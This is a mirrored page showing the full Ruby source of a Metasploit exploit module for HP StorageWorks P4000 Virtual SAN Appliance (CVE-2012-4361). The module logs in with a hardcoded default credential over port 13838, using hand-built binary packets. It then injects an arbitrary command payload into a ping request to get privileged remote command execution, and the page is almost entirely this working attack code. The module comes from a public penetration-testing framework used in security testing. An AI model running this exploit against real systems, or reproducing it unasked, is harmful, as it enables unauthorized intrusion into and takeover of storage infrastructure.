Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/hp_vsa_exec.rb
19512 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
16
'Description' => %q{
17
This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
18
versions prior to 9.5. By using a default account credential, it is possible
19
to inject arbitrary commands as part of a ping request via port 13838.
20
},
21
'License' => MSF_LICENSE,
22
'Author' => [
23
'Nicolas Gregoire', # Discovery, PoC, additional assistance
24
'sinn3r' # Metasploit module
25
],
26
'References' => [
27
['CVE', '2012-4361'],
28
['OSVDB', '82087'],
29
['EDB', '18893'],
30
['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],
31
['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086'],
32
['URL', 'http://www.agarri.fr/blog/archives/2012/02/index.html'] # Original Disclosure
33
],
34
'Payload' => {
35
'BadChars' => "/",
36
'Compat' =>
37
{
38
'PayloadType' => 'cmd',
39
'RequiredCmd' => 'generic perl telnet'
40
}
41
},
42
'DefaultOptions' => {
43
'EXITFUNC' => 'thread'
44
},
45
'Platform' => %w{linux unix},
46
'Arch' => ARCH_CMD,
47
'Targets' => [
48
[ 'Automatic', {} ],
49
[ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
50
[ 'HP VSA 9', { 'Version' => '9.0.0' } ]
51
],
52
'Privileged' => true,
53
'DisclosureDate' => '2011-11-11',
54
'DefaultTarget' => 0,
55
'Notes' => {
56
'Reliability' => UNKNOWN_RELIABILITY,
57
'Stability' => UNKNOWN_STABILITY,
58
'SideEffects' => UNKNOWN_SIDE_EFFECTS
59
}
60
)
61
)
62
63
register_options(
64
[
65
OptPort.new('RPORT', [true, 'The remote port', 13838])
66
]
67
)
68
end
69
70
def generate_packet(data)
71
pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
72
pkt << [data.length + 1].pack("N*")
73
pkt << "\x00\x00\x00\x00"
74
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
75
pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
76
pkt << data
77
pkt << "\x00"
78
79
pkt
80
end
81
82
def get_target
83
if target.name !~ /Automatic/
84
return target
85
end
86
87
# Login at 8.5.0
88
packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
89
print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
90
sock.put(packet)
91
res = sock.get_once
92
vprint_status(Rex::Text.to_hex_dump(res)) if res
93
if res and res =~ /OK/ and res =~ /Login/
94
return targets[1]
95
end
96
97
# Login at 9.0.0
98
packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
99
print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
100
sock.put(packet)
101
res = sock.get_once
102
vprint_status(Rex::Text.to_hex_dump(res)) if res
103
if res and res =~ /OK/ and res =~ /Login/
104
return targets[2]
105
end
106
107
fail_with(Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
108
end
109
110
def exploit
111
connect
112
113
if target.name =~ /Automatic/
114
my_target = get_target
115
print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
116
else
117
my_target = target
118
print_status("#{rhost}:#{rport} Sending login packet")
119
packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
120
sock.put(packet)
121
res = sock.get_once
122
vprint_status(Rex::Text.to_hex_dump(res)) if res
123
end
124
125
# Command execution
126
print_status("#{rhost}:#{rport} Sending injection")
127
data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
128
data << "64/5/" if my_target.name =~ /9/
129
packet = generate_packet(data)
130
sock.put(packet)
131
res = sock.get_once
132
vprint_status(Rex::Text.to_hex_dump(res)) if res
133
134
handler
135
disconnect
136
end
137
end
138
139